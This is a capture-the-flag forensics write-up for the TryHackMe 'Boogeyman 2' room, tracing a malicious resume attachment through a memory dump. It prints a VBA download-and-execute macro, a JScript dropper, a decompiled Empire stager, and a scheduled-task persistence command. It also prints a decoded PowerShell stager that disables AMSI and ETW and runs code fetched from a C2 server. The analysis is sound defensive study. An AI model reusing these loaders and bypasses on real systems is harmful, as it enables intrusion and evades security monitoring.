Boogeyman 2
The Boogeyman is back. Are you still afraid of the Boogeyman?
Last updated
The Boogeyman is back. Are you still afraid of the Boogeyman?
Last updated
Challenge Link: TryHackMe - Boogeyman 2
Maxine, a Human Resource Specialist working for Quick Logistics LLC, received an application from one of the open positions in the company. Unbeknownst to her, the attached resume was malicious and compromised her workstation.
A Python3 http server was started in the THM machine:
ubuntu@tryhackme:~$ cd Desktop/Artefacts/
ubuntu@tryhackme:~/Desktop/Artefacts$ python3 -m http.server
Then the files were downloaded using a local browser:
The attachment includes a .doc file which was extracted and checked for completion:
$ cat Resume\ -\ Application\ for\ Junior\ IT\ Analyst\ Role.eml | grep -i -E '^[A-Z0-9+/=]{32,76}' | tr -d '\r\n' | base64 -d > Resume_WesleyTaylor.doc
$ file Resume_WesleyTaylor.doc
Resume_WesleyTaylor.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: tryhackme, Template: Normal, Last Saved By: tryhackme, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 05:00, Create Time/Date: Sun Aug 20 21:49:00 2023, Last Saved Time/Date: Sun Aug 20 22:24:00 2023, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
$ binwalk Resume_WesleyTaylor.doc
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
4865 0x1301 PNG image, 468 x 222, 8-bit/color RGBA, non-interlaced
4919 0x1337 TIFF image data, big-endian, offset of first image directory: 8
35138 0x8942 Zip archive data, at least v2.0 to extract, compressed size: 255, uncompressed size: 540, name: [Content_Types].xml
35442 0x8A72 Zip archive data, at least v2.0 to extract, compressed size: 192, uncompressed size: 310, name: _rels/.rels
35675 0x8B5B Zip archive data, at least v2.0 to extract, compressed size: 131, uncompressed size: 138, name: theme/theme/themeManager.xml
35864 0x8C18 Zip archive data, at least v2.0 to extract, compressed size: 1939, uncompressed size: 8393, name: theme/theme/theme1.xml
37855 0x93DF Zip archive data, at least v2.0 to extract, compressed size: 182, uncompressed size: 283, name: theme/theme/_rels/themeManager.xml.rels
38455 0x9637 End of Zip archive, footer length: 22
38477 0x964D XML document, version: "1.0"
$ md5sum Resume_WesleyTaylor.doc
52c4384a0b9e248b95804352ebec6c5b Resume_WesleyTaylor.doc
The compromised workstation seems to be running on Windows 10:
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win10x64_18362
AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace ($THM/Boogeyman2/WKSTN-2961.raw)
PAE type : No PAE
DTB : 0x1aa000L
KDBG : 0xf802536405e0L
Number of Processors : 2
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff80252340000L
KPCR for CPU 1 : 0xffffa601e54c0000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2023-08-21 14:14:28 UTC+0000
Image local date and time : 2023-08-21 15:14:28 +0100
And that particular endpoint is owned by maxine.beck
:
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep 'Resume_WesleyTaylor'
0xe58f86465740 \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc 216
0xe58f878c1420 \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc 216
The email attachment includes a macro (denoted by the character, M
) named NewMacros
:
$ python3 ./git/DidierStevensSuite/oledump.py ./CTF/THM/Boogeyman2/Resume_WesleyTaylor.doc
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7288 '1Table'
5: 28574 'Data'
6: 414 'Macros/PROJECT'
7: 71 'Macros/PROJECTwm'
8: M 2027 'Macros/VBA/NewMacros'
9: m 962 'Macros/VBA/ThisDocument'
10: 2787 'Macros/VBA/_VBA_PROJECT'
11: 2242 'Macros/VBA/__SRP_0'
12: 122 'Macros/VBA/__SRP_1'
13: 935 'Macros/VBA/__SRP_2'
14: 156 'Macros/VBA/__SRP_3'
15: 570 'Macros/VBA/dir'
16: 4096 'WordDocument'
Looking at what it does:
$ python3 ./git/DidierStevensSuite/oledump.py -s 8 --vbadecompress $THM/Boogeyman2/Resume_WesleyTaylor.doc
Once the document is opened, it will download a file (upload.png
) and save it as update.js
then execute it via wscript.exe
:
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
spath = "C:\ProgramData\"
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png", False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile spath & "\update.js", 2
End With
Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("wscript.exe C:\ProgramData\update.js")
End Sub
Confirming the execution via the memory dump, the malicious process, wscript.exe
(PID 4260) indeed spawned from Microsoft Word (PID 1124) and eventually updater.exe
(PID 6216):
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 pstree | grep -C2 -i wscript
Volatility Foundation Volatility Framework 2.6.1
... 0xffffe58f87c8a080:OUTLOOK.EXE 1440 596 22 0 2023-08-21 14:09:04 UTC+0000
.... 0xffffe58f81150080:WINWORD.EXE 1124 1440 18 0 2023-08-21 14:12:31 UTC+0000
..... 0xffffe58f864ca0c0:wscript.exe 4260 1124 6 0 2023-08-21 14:12:47 UTC+0000
...... 0xffffe58f87ac0080:updater.exe 6216 4260 18 0 2023-08-21 14:12:48 UTC+0000
....... 0xffffe58f84bd1080:conhost.exe 4464 6216 5 0 2023-08-21 14:14:03 UTC+0000
To figure out the origins of updater.exe
, the initially downloaded file (update.png
) was extracted from the memory dump:
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep 'update'
0xe58f836edc60 \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\IE\GEX3PLZ6\update[1].png 216
0xe58f8928f8b0 \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\IE\FMJK14EZ\update[1].exe 216
0xe58f89291e30 \Windows\Tasks\updater.exe 216
0xe58f89293730 \Windows\Tasks\updater.exe 216
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw -o $THM/Boogeyman2/volatility/ windows.dumpfiles --virtaddr 0xe58f836edc60
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe58f836edc60 update[1].png file.0xe58f836edc60.0xe58f87ddb320.DataSectionObject.update[1].png.dat
The following shows that a file (update.exe
) is downloaded and saved as updater.exe
which is then executed as is:
var Object = WScript.CreateObject('MSXML2.XMLHTTP');
var wshell = new ActiveXObject("WScript.Shell");
var location = "C:\\Windows\\Tasks\\";
var filename = "updater.exe";
var url = "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe"
Object.Open('GET', url, false);
Object.Send();
if (Object.Status == 200)
{
var Stream = WScript.CreateObject('ADODB.Stream');
Stream.Open();
Stream.Type = 1; // Stream type 1 to set binary stream
Stream.Write(Object.ResponseBody);
Stream.Position = 0;
Stream.SaveToFile(location + filename, 2); // option 2 to force overwrite
Stream.Close();
}
wshell.Run("cmd.exe /c reg.exe add \"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\" /v C:\\Windows\\Tasks /f");
wshell.Run(location + filename);
WScript.Sleep(5*60*1000);
Looking at what updater.exe
is, it was extracted from the memory dump then decompiled using dnSpy:
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 procdump -D $THM/Boogeyman2/volatility -p 6216
Volatility Foundation Volatility Framework 2.6.1
Process(V) ImageBase Name Result
------------------ ------------------ -------------------- ------
0xffffe58f87ac0080 0x0000000000c20000 updater.exe OK: executable.6216.exe
$ file executable.6216.exe
executable.6216.exe: PE32+ executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 2 sections
It is an Empire stager compiled via Sharpire:
// Sharpire.EmpireStager
// Token: 0x06000010 RID: 16 RVA: 0x00002578 File Offset: 0x00000778
public EmpireStager(SessionInfo sessionInfo1)
{
this.sessionInfo = sessionInfo1;
this.stagingKeyBytes = Encoding.ASCII.GetBytes(this.sessionInfo.GetStagingKey());
Random random = new Random();
char[] array = "ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray();
StringBuilder stringBuilder = new StringBuilder(8);
for (int i = 0; i < 8; i++)
{
int num = random.Next(array.Length);
stringBuilder.Append(array[num]);
}
this.sessionInfo.SetAgentID(stringBuilder.ToString());
CspParameters cspParameters = new CspParameters();
cspParameters.Flags |= CspProviderFlags.UseMachineKeyStore;
this.rsaCrypto = new RSACryptoServiceProvider(2048, cspParameters);
}
And calls back to 128.199.95.189:8080
:
using System;
using Sharpire;
// Token: 0x02000002 RID: 2
public static class Program
{
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
public static void Main()
{
try
{
string text = "http://128.199.95.189:8080";
string text2 = "xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp";
string workingHours = "";
uint defaultDelay = 5U;
double defaultJitter = 0.0;
uint defaultLostLimit = 60U;
string text3 = "dotnet";
SessionInfo sessionInfo = new SessionInfo(new string[]
{
text,
text2,
text3
});
sessionInfo.SetWorkingHours(workingHours);
sessionInfo.SetDefaultJitter(defaultJitter);
sessionInfo.SetDefaultDelay(defaultDelay);
sessionInfo.SetDefaultLostLimit(defaultLostLimit);
new EmpireStager(sessionInfo).Execute();
}
catch (Exception ex)
{
Console.WriteLine(string.Concat(new string[]
{
ex.GetType().FullName,
": ",
ex.Message,
Environment.NewLine,
ex.StackTrace
}));
}
}
}
Which when confirmed via the memory dump, there was a connection but seems to have been marked as CLOSED
but the process is still running meaning the agent might be currently inactive:
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 netscan | grep -C2 updater.exe
Volatility Foundation Volatility Framework 2.6.1
WARNING : volatility.debug : Cannot find nt!ObGetObjectType
0xe58f86b73010 TCPv4 10.10.49.181:63308 128.199.95.189:8080 CLOSED -1 3884-06-06 01:06:33 UTC+0000
0xe58f87604010 TCPv4 10.10.49.181:63218 20.42.65.88:443 CLOSED -1 3884-06-06 01:06:31 UTC+0000
0xe58f8797fc40 UDPv4 0.0.0.0:0 *:* 6216 updater.exe 2023-08-21 14:12:48 UTC+0000
0xe58f87980570 UDPv4 0.0.0.0:0 *:* 6216 updater.exe 2023-08-21 14:12:48 UTC+0000
0xe58f87980570 UDPv6 :::0 *:* 6216 updater.exe 2023-08-21 14:12:48 UTC+0000
Extracting the process memory of updater.exe
from the dump to see if command executions could be discovered:
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 memdump -p 6216 -D $THM/Boogeyman2/volatility
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
Writing updater.exe [ 6216] to 6216.dmp
It can be seen that a scheduled task named Updater
was attempted to be created:
$ strings -el 6216.dmp | grep -i "powershell.exe "
"C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\""
"C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\""
Confirming if the scheduled task was created, the task file was extracted from the memory dump:
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep -i 'System32\\Tasks\\'
0xe58f86b42440 \Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask 216
0xe58f89295990 \Windows\System32\Tasks\Updater 216
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw -o $THM/Boogeyman2/volatility/ windows.dumpfiles --virtaddr 0xe58f89295990
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe58f89295990 Updater file.0xe58f89295990.0xe58f838dcbe0.DataSectionObject.Updater.dat
The following is the XML configuration of the scheduled task indicating its successful creation:
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2023-08-21T15:14:03</Date>
<Author>QUICKLOGISTICS\maxine.beck</Author>
<URI>\Updater</URI>
</RegistrationInfo>
<Triggers>
<CalendarTrigger>
<StartBoundary>2023-08-21T09:00:00</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Settings>
<!-- omitted -->
</Settings>
<Actions Context="Author">
<Exec>
<Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
<Arguments>-NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"</Arguments>
</Exec>
</Actions>
<Principals>
<Principal id="Author">
<UserId>QUICKLOGISTICS\maxine.beck</UserId>
<LogonType>InteractiveToken</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
</Task>
The command being run by the scheduled task executes a base64 encoded string stored in an HKEY_CURRENT_USER registry meaning that it should be visible in the compromised user, maxine.beck
's NTUSER.DAT file. And, extracting the particular hive from the memory dump:
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 hivelist
Volatility Foundation Volatility Framework 2.6.1
Virtual Physical Name
------------------ ------------------ ----
0xffff9582f2681000 0x000000000f08d000 \??\C:\Users\maxine.beck\ntuser.dat
0xffff9582f1ad4000 0x0000000013f84000 \??\C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffff9582f326d000 0x000000001ed22000 \??\C:\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.387_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat
0xffff9582eae0d000 0x00000000009ad000 [no name]
0xffff9582eae33000 0x00000000072ca000 \REGISTRY\MACHINE\SYSTEM
0xffff9582ee925000 0x0000000023098000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffff9582eea98000 0x0000000020d34000 \SystemRoot\System32\Config\BBI
0xffff9582eead5000 0x00000000323b5000 \REGISTRY\USER\S-1-5-19
0xffff9582efe8e000 0x00000000054f7000 \REGISTRY\A\{c5dbb98f-ac23-f861-cb09-87c8bc73488b}
0xffff9582f11fc000 0x00000000301f8000 [no name]
0xffff9582f2b90000 0x00000000369ba000 [no name]
0xffff9582eb808000 0x000000001003a000 \REGISTRY\MACHINE\SOFTWARE
0xffff9582f050b000 0x00000000154b2000 \Device\HarddiskVolume1\Boot\BCD
0xffff9582f2c10000 0x0000000019aed000 \REGISTRY\A\{91B92570-4098-466B-9A97-B1F699128FD3}
0xffff9582eb805000 0x000000000ddc1000 \REGISTRY\USER\.DEFAULT
0xffff9582f26ac000 0x000000000662b000 \??\C:\Users\maxine.beck\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat
$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 dumpregistry -D $THM/Boogeyman2/volatility -o 0xffff9582f2681000
Volatility Foundation Volatility Framework 2.6.1
**************************************************
Writing out registry: registry.0xffff9582f2681000.ntuserdat.reg
[..omitted..]
***********************************************
Then, looking for long base64 strings stored:
$ strings -el registry.0xffff9582f2681000.ntuserdat.reg | grep -i -E '[a-z0-9\+\/=]{100,}'
SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATwBBAEEAdQBBAEQARQBBAE8AUQBBADUAQQBDADQAQQBPAFEAQQAxAEEAQwA0AEEATQBRAEEANABBAEQAawBBAE8AZwBBADQAQQBEAEEAQQBPAEEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB4AEYAfQBEAGwAWABLAHQAagBaADkALwB6AGEAUwAyAD4AcwBtAFkAaQBVAEMAKwA7AC0AeQBMAHEAUQBPAHAAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAGgAbABGAEsAcwBBAE8AagA9AFkAYgBNAEwANwAxAGsAUgBtAEsAZQBBADUAMAAzAE0AOABWAGoAcwA4AFcAOABXADQAZgBZAD0AIgApADsAJABkAGEAdABhAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAuAC4AMwBdADsAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC4AJABkAGEAdABhAC4AbABlAG4AZwB0AGgAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
$ strings -el registry.0xffff9582f2681000.ntuserdat.reg | grep -i -E '[a-z0-9\+\/=]{100,}' | base64 -d
If($PSVersionTable.PSVersion.Major -ge 3){$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA==')));$t='/news.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","hlFKsAOj=YbML71kRmKeA503M8Vjs8W8W4fY=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
It is another Empire stager which was set up for persistence:
If($PSVersionTable.PSVersion.Major -ge 3){
$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');
$Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);
};
[System.Net.ServicePointManager]::Expect100Continue=0;
$wc=New-Object System.Net.WebClient;
$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA==')));
$t='/news.php';
$wc.Headers.Add('User-Agent',$u);
$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp');
$R={
$D,$K=$Args;
$S=0..255;0..255|%{
$J=($J+$S[$_]+$K[$_%$K.Count])%256;
$S[$_],$S[$J]=$S[$J],$S[$_]
};
$D|%{
$I=($I+1)%256;
$H=($H+$S[$I])%256;
$S[$I],$S[$H]=$S[$H],$S[$I];
$_-bxor$S[($S[$I]+$S[$H])%256]
}
};
$wc.Headers.Add("Cookie","hlFKsAOj=YbML71kRmKeA503M8Vjs8W8W4fY=");
$data=$wc.DownloadData($ser+$t);
$iv=$data[0..3];
$data=$data[4..$data.length];
-join[Char[]](& $R $data ($IV+$K))|IEX
Which also calls back to 128.199.95.189:8080
:
$ echo aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA== | base64 -d
http://128.199.95.189:8080
Header | Value |
---|---|